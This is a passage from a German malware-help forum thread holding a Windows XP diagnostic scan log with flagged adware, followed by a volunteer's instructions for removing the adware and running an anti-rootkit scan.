Sicherheitsupdate für Windows XP (KB2661637) (HKLM\...\KB2661637) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2676562) (HKLM\...\KB2676562) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2685939) (HKLM\...\KB2685939) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2686509) (HKLM\...\KB2686509) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2691442) (HKLM\...\KB2691442) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2695962) (HKLM\...\KB2695962) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2698365) (HKLM\...\KB2698365) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2705219) (HKLM\...\KB2705219) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2707511) (HKLM\...\KB2707511) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2709162) (HKLM\...\KB2709162) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2712808) (HKLM\...\KB2712808) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2718523) (HKLM\...\KB2718523) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2719985) (HKLM\...\KB2719985) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2723135) (HKLM\...\KB2723135) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2724197) (HKLM\...\KB2724197) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2727528) (HKLM\...\KB2727528) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2731847) (HKLM\...\KB2731847) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2753842) (HKLM\...\KB2753842) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2753842-v2) (HKLM\...\KB2753842-v2) (Version: 2 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2757638) (HKLM\...\KB2757638) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2758857) (HKLM\...\KB2758857) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2761226) (HKLM\...\KB2761226) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2770660) (HKLM\...\KB2770660) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2778344) (HKLM\...\KB2778344) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2779030) (HKLM\...\KB2779030) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2780091) (HKLM\...\KB2780091) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2799494) (HKLM\...\KB2799494) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2802968) (HKLM\...\KB2802968) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2807986) (HKLM\...\KB2807986) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2808735) (HKLM\...\KB2808735) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2813170) (HKLM\...\KB2813170) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2813345) (HKLM\...\KB2813345) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2820197) (HKLM\...\KB2820197) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2820917) (HKLM\...\KB2820917) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2834886) (HKLM\...\KB2834886) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2839229) (HKLM\...\KB2839229) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2845187) (HKLM\...\KB2845187) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2847311) (HKLM\...\KB2847311) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2849470) (HKLM\...\KB2849470) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2850851) (HKLM\...\KB2850851) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2850869) (HKLM\...\KB2850869) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2859537) (HKLM\...\KB2859537) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2862152) (HKLM\...\KB2862152) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2862330) (HKLM\...\KB2862330) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2862335) (HKLM\...\KB2862335) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2864063) (HKLM\...\KB2864063) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2868038) (HKLM\...\KB2868038) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2868626) (HKLM\...\KB2868626) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2876217) (HKLM\...\KB2876217) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2876331) (HKLM\...\KB2876331) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2884256) (HKLM\...\KB2884256) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2892075) (HKLM\...\KB2892075) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2893294) (HKLM\...\KB2893294) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2893984) (HKLM\...\KB2893984) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2898715) (HKLM\...\KB2898715) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2900986) (HKLM\...\KB2900986) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2914368) (HKLM\...\KB2914368) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2916036) (HKLM\...\KB2916036) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2922229) (HKLM\...\KB2922229) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2929961) (HKLM\...\KB2929961) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB2930275) (HKLM\...\KB2930275) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB923561) (HKLM\...\KB923561) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB923689) (HKLM\...\KB923689) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB923789) (HKLM\...\KB923789) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB941569) (HKLM\...\KB941569) (Version:  - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB946648) (HKLM\...\KB946648) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB950762) (HKLM\...\KB950762) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB950974) (HKLM\...\KB950974) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB951376-v2) (HKLM\...\KB951376-v2) (Version: 2 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB951748) (HKLM\...\KB951748) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB952004) (HKLM\...\KB952004) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB952954) (HKLM\...\KB952954) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB955069) (HKLM\...\KB955069) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB956572) (HKLM\...\KB956572) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB956744) (HKLM\...\KB956744) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB956802) (HKLM\...\KB956802) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB956803) (HKLM\...\KB956803) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB956844) (HKLM\...\KB956844) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB958644) (HKLM\...\KB958644) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB958869) (HKLM\...\KB958869) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB959426) (HKLM\...\KB959426) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB960225) (HKLM\...\KB960225) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB960803) (HKLM\...\KB960803) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB960859) (HKLM\...\KB960859) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB961501) (HKLM\...\KB961501) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB969059) (HKLM\...\KB969059) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB970238) (HKLM\...\KB970238) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB970430) (HKLM\...\KB970430) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB971468) (HKLM\...\KB971468) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB971657) (HKLM\...\KB971657) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB972270) (HKLM\...\KB972270) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB973507) (HKLM\...\KB973507) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB973869) (HKLM\...\KB973869) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB973904) (HKLM\...\KB973904) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB974112) (HKLM\...\KB974112) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB974318) (HKLM\...\KB974318) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB974392) (HKLM\...\KB974392) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB974571) (HKLM\...\KB974571) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB975025) (HKLM\...\KB975025) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB975467) (HKLM\...\KB975467) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB975560) (HKLM\...\KB975560) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB975561) (HKLM\...\KB975561) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB975562) (HKLM\...\KB975562) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB975713) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows XP (KB977816) (HKLM\...\KB977816) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB977914) (HKLM\...\KB977914) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB978037) (HKLM\...\KB978037) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB978338) (HKLM\...\KB978338) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB978542) (HKLM\...\KB978542) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB978601) (HKLM\...\KB978601) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB978706) (HKLM\...\KB978706) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB979309) (HKLM\...\KB979309) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB979482) (HKLM\...\KB979482) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB979559) (HKLM\...\KB979559) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB979683) (HKLM\...\KB979683) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB979687) (HKLM\...\KB979687) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB980195) (HKLM\...\KB980195) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB980218) (HKLM\...\KB980218) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB980232) (HKLM\...\KB980232) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB981322) (HKLM\...\KB981322) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB981997) (HKLM\...\KB981997) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB982132) (HKLM\...\KB982132) (Version: 1 - Microsoft Corporation)
Sicherheitsupdate für Windows XP (KB982381) (Version: 1 - Microsoft Corporation) Hidden
Sicherheitsupdate für Windows XP (KB982665) (HKLM\...\KB982665) (Version: 1 - Microsoft Corporation)
Softonic toolbar  on IE (HKLM\...\Softonic) (Version:  - Softonic) <==== ATTENTION
Sweet Home 3D version 3.5 (HKLM\...\Sweet Home 3D_is1) (Version:  - eTeks)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 9.0.3.0 - Synaptics)
Trojan Remover 6.9.1.2931 (HKLM\...\Trojan Remover_is1) (Version: 6.9.1.2931 - Simply Super Software)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)
Update for Microsoft Office 2007 suites (KB2596620) 32-Bit Edition (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{A024FC7B-77DE-45DE-A058-1C049A17BFB3}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767849) 32-Bit Edition (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{CB68A5B0-3508-4193-AEB9-AF636DAECE0F}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767916) 32-Bit Edition (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{E9A82945-BA29-4EE8-8F2A-2F49545E9CF2}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2687404) 32-Bit Edition (HKLM\...\{90120000-001A-0407-0000-0000000FF1CE}_PROHYBRIDR_{EA54F104-79D2-48CC-9ABC-91A63C43D353}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2863811) 32-Bit Edition (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{53DEC068-4690-4F6B-9946-7D21EF02236B}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Junk Email Filter (KB2881065) 32-Bit Edition (HKLM\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{B7EF38F7-1D58-4085-A9A4-0F6C69A5AA1E}) (Version:  - Microsoft)
Update für Windows Internet Explorer 8 (KB2598845) (HKLM\...\KB2598845-IE8) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2345886) (HKLM\...\KB2345886) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2467659) (HKLM\...\KB2467659) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2641690) (HKLM\...\KB2641690) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2661254-v2) (HKLM\...\KB2661254-v2) (Version: 2 - Microsoft Corporation)
Update für Windows XP (KB2718704) (HKLM\...\KB2718704) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2736233) (HKLM\...\KB2736233) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2749655) (HKLM\...\KB2749655) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2863058) (HKLM\...\KB2863058) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2904266) (HKLM\...\KB2904266) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB2934207) (HKLM\...\KB2934207) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB951978) (Version: 1 - Microsoft Corporation) Hidden
Update für Windows XP (KB955759) (HKLM\...\KB955759) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB967715) (HKLM\...\KB967715) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB968389) (HKLM\...\KB968389) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB971029) (HKLM\...\KB971029) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB973687) (HKLM\...\KB973687) (Version: 1 - Microsoft Corporation)
Update für Windows XP (KB973815) (HKLM\...\KB973815) (Version: 1 - Microsoft Corporation)
VSDC Free Video Editor Version 2.1.3.73 (HKLM\...\VSDC Free Video Editor_is1) (Version: 2.1.3.73 - Flash-Integro LLC)
WebFldrs XP (Version: 9.50.7523 - Microsoft Corporation) Hidden
Windows Genuine Advantage Notifications (KB905474) (HKLM\...\WgaNotify) (Version: 1.9.0040.0 - Microsoft Corporation)
Windows Genuine Advantage Validation Tool (KB892130) (HKLM\...\KB892130) (Version:  - Microsoft Corporation)
Windows Genuine Advantage Validation Tool (KB892130) (HKLM\...\WGA) (Version: 1.7.0069.2 - Microsoft Corporation)
Windows Internet Explorer 8 (HKLM\...\ie8) (Version: 20090308.140743 - Microsoft Corporation)
Windows Media Format 11 runtime (HKLM\...\Windows Media Format Runtime) (Version:  - )
Windows Media Format 11 runtime (Version:  - Microsoft Corporation) Hidden
Windows Movie Maker 2.0 (Version: 2.0.0000 - Microsoft Corporation) Hidden
Windows XP Service Pack 3 (HKLM\...\Windows XP Service Pack) (Version: 20080414.031514 - Microsoft Corporation)
Windows-Treiberpaket - Nokia pccsmcfd “LegacyDriver”  (05/31/2012 7.1.2.0) (HKLM\...\17D063A0A9F5D5A225B76B1D9BCB5ADBE85C8382) (Version: 05/31/2012 7.1.2.0 - Nokia)
WinZip (HKLM\...\WinZip) (Version:  8.1 SR-1  (5266) - WinZip Computing, Inc.)
XSManager (HKLM\...\XSManager) (Version: 3.0 - XSManager)
Yontoo 1.10.02 (HKLM\...\{889DF117-14D1-44EE-9F31-C5FB5D47F68B}) (Version: 1.10.02 - Yontoo LLC) <==== ATTENTION

==================== Restore Points  =========================

Could not list Restore Points. Check "winmgmt" service or repair WMI.


==================== Hosts content: ==========================

2007-07-24 18:45 - 2004-08-04 14:00 - 00000820 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Scheduled Tasks (whitelisted) =============

Task: C:\WINDOWS\Tasks\Ende des Supports für Microsoft Windows XP –  Benachrichtigung – Anmeldung.job => ?
Task: C:\WINDOWS\Tasks\Ende des Supports für Microsoft Windows XP – Monatliche Benachrichtigung.job => ?
Task: C:\WINDOWS\Tasks\Lyrics-Pal Update.job => ?
Task: C:\WINDOWS\Tasks\Opera scheduled Autoupdate 1395589487.job => C:\Programme\Opera\launcher.exe

==================== Loaded Modules (whitelisted) =============

2013-06-17 12:35 - 2013-06-17 12:35 - 00478400 _____ () C:\Programme\Kaspersky Lab\Kaspersky Internet Security 14.0.0\dblite.dll
2012-12-21 18:57 - 2012-12-21 18:57 - 08507384 _____ () C:\Programme\Nokia\Nokia Suite\QtGui4.dll
2012-12-21 18:57 - 2012-12-21 18:57 - 02354168 _____ () C:\Programme\Nokia\Nokia Suite\QtCore4.dll
2012-12-21 18:57 - 2012-12-21 18:57 - 01014776 _____ () C:\Programme\Nokia\Nokia Suite\QtNetwork4.dll
2012-12-21 18:57 - 2012-12-21 18:57 - 00364536 _____ () C:\Programme\Nokia\Nokia Suite\QtXml4.dll
2012-12-21 18:57 - 2012-12-21 18:57 - 02481144 _____ () C:\Programme\Nokia\Nokia Suite\QtDeclarative4.dll
2012-12-21 18:57 - 2012-12-21 18:57 - 01347064 _____ () C:\Programme\Nokia\Nokia Suite\QtScript4.dll
2012-12-21 18:57 - 2012-12-21 18:57 - 00206328 _____ () C:\Programme\Nokia\Nokia Suite\QtSql4.dll
2012-12-21 18:57 - 2012-12-21 18:57 - 02653176 _____ () C:\Programme\Nokia\Nokia Suite\QtXmlPatterns4.dll
2012-12-21 18:57 - 2012-12-21 18:57 - 00033272 _____ () C:\Programme\Nokia\Nokia Suite\imageformats\qgif4.dll
2012-12-21 18:57 - 2012-12-21 18:57 - 00035832 _____ () C:\Programme\Nokia\Nokia Suite\imageformats\qico4.dll
2012-12-21 18:57 - 2012-12-21 18:57 - 00207352 _____ () C:\Programme\Nokia\Nokia Suite\imageformats\qjpeg4.dll
2012-12-21 16:29 - 2012-12-21 16:29 - 00391600 _____ () C:\Programme\Nokia\Nokia Suite\ssoengine.dll
2012-12-21 16:29 - 2012-12-21 16:29 - 00059280 _____ () C:\Programme\Nokia\Nokia Suite\securestorage.dll
2012-12-21 18:57 - 2012-12-21 18:57 - 11166712 _____ () C:\Programme\Nokia\Nokia Suite\QtWebKit4.dll
2012-12-21 18:57 - 2012-12-21 18:57 - 00276984 _____ () C:\Programme\Nokia\Nokia Suite\phonon4.dll
2012-12-21 18:57 - 2012-12-21 18:57 - 00446456 _____ () C:\Programme\Nokia\Nokia Suite\sqldrivers\qsqlite4.dll
2012-12-21 18:57 - 2012-12-21 18:57 - 00520696 _____ () C:\Programme\Nokia\Nokia Suite\QtMultimediaKit1.dll
2012-12-21 18:57 - 2012-12-21 18:57 - 00720888 _____ () C:\Programme\Nokia\Nokia Suite\QtOpenGL4.dll
2012-12-21 18:56 - 2012-12-21 18:56 - 00438264 _____ () C:\Programme\Nokia\Nokia Suite\NService.dll
2012-12-21 18:56 - 2012-12-21 18:56 - 00606200 _____ () C:\Programme\Nokia\Nokia Suite\CommonUpdateChecker.dll
2012-12-21 18:57 - 2012-12-21 18:57 - 00093176 _____ () C:\Programme\Nokia\Nokia Suite\qjson.dll
2012-12-21 16:29 - 2012-12-21 16:29 - 00110080 _____ () C:\Programme\Nokia\Nokia Suite\mediaservice\dsengine.dll
2007-07-24 18:45 - 2008-04-14 04:22 - 00014336 _____ () C:\WINDOWS\system32\msdmo.dll
2012-02-14 23:14 - 2012-05-23 18:21 - 01911768 _____ () C:\Programme\Mozilla Firefox\mozjs.dll
2012-02-18 20:01 - 2012-02-18 20:01 - 08527008 _____ () C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll
2011-06-22 12:46 - 2011-06-22 12:46 - 00434016 _____ () C:\Programme\Office\Office12\ADDINS\UmOutlookAddin.dll
2013-07-10 19:07 - 2013-07-10 19:07 - 00756888 _____ () C:\Programme\Gemeinsame Dateien\Microsoft Shared\OFFICE12\MSPTLS.DLL

==================== Alternate Data Streams (whitelisted) =========

AlternateDataStreams: C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\TEMP:CB0AACC9

==================== Safe Mode (whitelisted) ===================

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"

==================== EXE Association (whitelisted) =============


==================== MSCONFIG/TASK MANAGER disabled items =========


==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (06/08/2014 02:13:54 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Stillstehende Anwendung firefox.exe, Version 10.0.2.4428, Stillstandmodul hungapp, Version 0.0.0.0, Stillstandadresse 0x00000000.


System errors:
=============
Error: (06/15/2014 08:57:34 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Search Protect Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%2

Error: (06/15/2014 08:43:05 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Search Protect Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (06/09/2014 02:21:12 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Zeitüberschreitung (30000 ms) beim Warten auf eine Transaktionsrückmeldung von Dienst stisvc.

Error: (05/31/2014 09:55:37 AM) (Source: WPDMTPDriver) (EventID: 15300) (User: )
Description: MTP WPD Driver has failed to start. Error 0x8007001f.

Error: (05/08/2014 05:04:29 PM) (Source: 0) (EventID: 1) (User: )
Description: \Device\ACPIEC

Error: (05/04/2014 11:11:29 AM) (Source: 0) (EventID: 1) (User: )
Description: 0xC000007FkdbHarddiskVolume1

Error: (05/02/2014 00:51:13 PM) (Source: DCOM) (EventID: 10005) (User: PC_TG)
Description: Bei DCOM ist der Fehler "%%1053" aufgetreten, als der Dienst "ServiceLayer" mit den Argumenten ""
gestartet wurde, um den folgenden Server zu verwenden:
{ACF50018-41F8-476D-85FD-CD953DAE4A49}

Error: (05/02/2014 00:51:13 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "ServiceLayer" wurde aufgrund folgenden Fehlers nicht gestartet: 
%%1053

Error: (05/02/2014 00:51:13 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Zeitüberschreitung (30000 ms) beim Verbindungsversuch mit Dienst ServiceLayer.

Error: (04/21/2014 07:55:24 PM) (Source: 0) (EventID: 1) (User: )
Description: 0xC000007FinfoHarddiskVolume1


Microsoft Office Sessions:
=========================
Error: (03/11/2014 09:20:48 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6680.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 1428 seconds with 180 seconds of active time.  This session ended with a crash.

Error: (01/27/2014 03:12:20 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6680.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 11165 seconds with 660 seconds of active time.  This session ended with a crash.

Error: (04/05/2013 06:13:31 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 730 seconds with 120 seconds of active time.  This session ended with a crash.

Error: (12/11/2012 11:22:33 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6665.5003, Microsoft Office Version: 12.0.6612.1000. This session lasted 7984 seconds with 420 seconds of active time.  This session ended with a crash.


==================== Memory info =========================== 

Percentage of memory in use: 32%
Total physical RAM: 3062.36 MB
Available physical RAM: 2071.77 MB
Total Pagefile: 4942.34 MB
Available Pagefile: 3993.04 MB
Total Virtual: 2047.88 MB
Available Virtual: 1945.95 MB

==================== Drives ================================

Drive c: (System) (Fixed) (Total:232.88 GB) (Free:28.49 GB) NTFS ==>[Drive with boot components (Windows XP)]

==================== MBR & Partition Table ==================

==================== End Of Log ============================
         
Der verwendete User hat keine Administrator-Rechte.
Soll ich das Ganze auch nochmal mit dem Admin-Account laufen lassen, oder reicht das so aus?

Viele Grüße,
Metallica81
__________________

Alt 16.06.2014, 07:34   #4
schrauber
/// the machine
/// TB-Ausbilder
 

Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt - Standard

Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt



Unsere Tools brauchen immer Adminrechte.

XP? Ernsthaft? Du weißt darüber Bescheid?


Adware & Co. deinstallieren
  • Lade Dir bitte von hier Revo Uninstaller herunter.
  • Installiere und starte das Programm.
  • Suche im Uninstallerfeld nach den Programmen, die unter:

    diesen Zusatz haben:
  • Wähle die Programme nacheinander aus und klicke jedesmal auf Uninstall.
  • Wähle anschließend den Modus "Moderat" aus.
  • Reste löschen:
    Klicke auf dann auf und dann auf .

Solltest Du ein Programm nicht finden oder nicht deinstallieren können, mache bitte mit dem nächsten Schritt weiter:




Downloade dir bitte Malwarebytes Anti-Rootkit Malwarebytes Anti-Rootkit und speichere es auf deinem Desktop.
  • Starte bitte die mbar.exe.
  • Folge den Anweisungen auf deinem Bildschirm gemäß Anleitung zu Malwarebytes Anti-Rootkit
  • Aktualisiere unbedingt die Datenbank und erlaube dem Tool, dein System zu scannen.
  • Klicke auf den CleanUp Button und erlaube den Neustart.
  • Während dem Neustart wird MBAR die gefundenen Objekte entfernen, also bleib geduldig.
  • Nach dem Neustart starte die mbar.exe erneut.
  • Sollte nochmal was gefunden werden, wiederhole den CleanUp Prozess.
Das Tool wird im erstellten Ordner eine Logfile ( mbar-log-<Jahr-Monat-Tag>.txt ) erzeugen. Bitte poste diese hier.

Starte keine andere Datei in diesem Ordner ohne Anweisung eines Helfers
__________________
gruß,
schrauber

Proud Member of UNITE and ASAP since 2009

Spenden
Anleitungen und Hilfestellungen
Trojaner-Board Facebook-Seite

Keine Hilfestellung via PM!

Alt 16.06.2014, 21:42   #5
Metallica81
 
Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt - Standard

Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt



